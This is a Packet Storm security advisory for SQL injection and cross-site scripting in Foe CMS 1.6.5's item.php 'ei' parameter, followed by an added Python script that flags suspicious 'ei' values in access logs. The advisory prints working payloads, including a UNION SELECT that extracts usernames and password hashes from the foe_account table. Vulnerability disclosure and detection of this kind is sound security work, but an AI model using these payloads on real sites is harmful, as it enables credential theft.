Foe CMS 1.6.5 Cross Site Scripting / SQL Injection

2013-04-29T00:00:00
ID PACKETSTORM:121447
Type packetstorm
Reporter flux77
Modified 2013-04-29T00:00:00

Description

                                        
                                            `Title: Foe CMS 1.6.5 SQL Injection Vulnerability  
Vendor: http://foecms.com/  
Download: http://code.google.com/p/foecms/downloads/list  
Versions: 1.6.5  
Platform: linux, windows  
Bug: SQL Injection | Cross Site Scripting  
  
  
  
-------------------------------------------------------  
  
1) Introduction  
2) Bug  
3) Proof of concept  
4) Credits  
  
  
===========  
1) Introduction  
===========  
  
Category manager (like phpBB3)  
Move to object-oriented PHP  
account_meta for signature, occupation, avatar, etc. (like WordPress); allows adding and removing fields at will  
Rank-based permissions for EVERYTHING  
UCP page for changing access permissions (friends and the like)  
  
  
======  
2) Bug  
======  
  
SQL Injection  
http://victim/[path]/item.php?ei=[SQLi]  
  
Cross Site Scripting  
http://victim/[path]/item.php?ei=[XSS]  
  
  
=====  
3) Proof of concept  
=====  
  
Example SQLi  
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--  
  
Example XSS  
http://victim/[path]/item.php?ei=<script>alert(1)</script>  
  
  
=====  
4) Credits  
=====  
  
flux77  
Contact : 0xflux77 at gmail.com  
  
`
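
A log-review check for the `ei` parameter described above, as an added example that is not part of the original advisory: both proofs of concept place non-numeric data in `ei`, so any `item.php` request whose `ei` is not a plain integer is worth flagging. The access-log lines are constructed, and the rule that legitimate `ei` values are non-negative integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate item ids are non-negative decimal integers.
VALID_EI = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (not from a real server); the two flagged
# requests reuse the advisory's own proof-of-concept values, URL-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Apr/2013:10:00:01 +0000] "GET /foe/item.php?ei=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [29/Apr/2013:10:00:07 +0000] "GET /foe/item.php?ei=-1%20union%20select%201,username,pass_sha,1,1,1,1,1,1%20from%20foe_account-- HTTP/1.1" 200 734',
    '192.0.2.44 - - [29/Apr/2013:10:00:09 +0000] "GET /foe/item.php?ei=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 690',
    '192.0.2.10 - - [29/Apr/2013:10:00:15 +0000] "GET /foe/index.php HTTP/1.1" 200 2048',
]

def classify(value):
    """Label a rejected ei value with coarse hints for triage."""
    hints = []
    if re.search(r"\b(union|select|from)\b|--", value.lower()):
        hints.append("sql-keywords")
    if "<" in value or ">" in value:
        hints.append("html-markup")
    return hints or ["non-numeric"]

def suspicious_requests(lines):
    """Return (client, ei value, hints) for item.php requests with a bad ei."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/item.php"):
            continue
        # parse_qs percent-decodes values and keeps repeated parameters,
        # so every occurrence of ei is checked, not just the first.
        for value in parse_qs(url.query, keep_blank_values=True).get("ei", []):
            if not VALID_EI.fullmatch(value):
                findings.append((line.split()[0], value, classify(value)))
    return findings

if __name__ == "__main__":
    for client, value, hints in suspicious_requests(SAMPLE_LOG):
        print(client, hints, repr(value))
```

The same whole-value integer check, applied server-side before `ei` reaches the query or the page output, rejects both proof-of-concept requests.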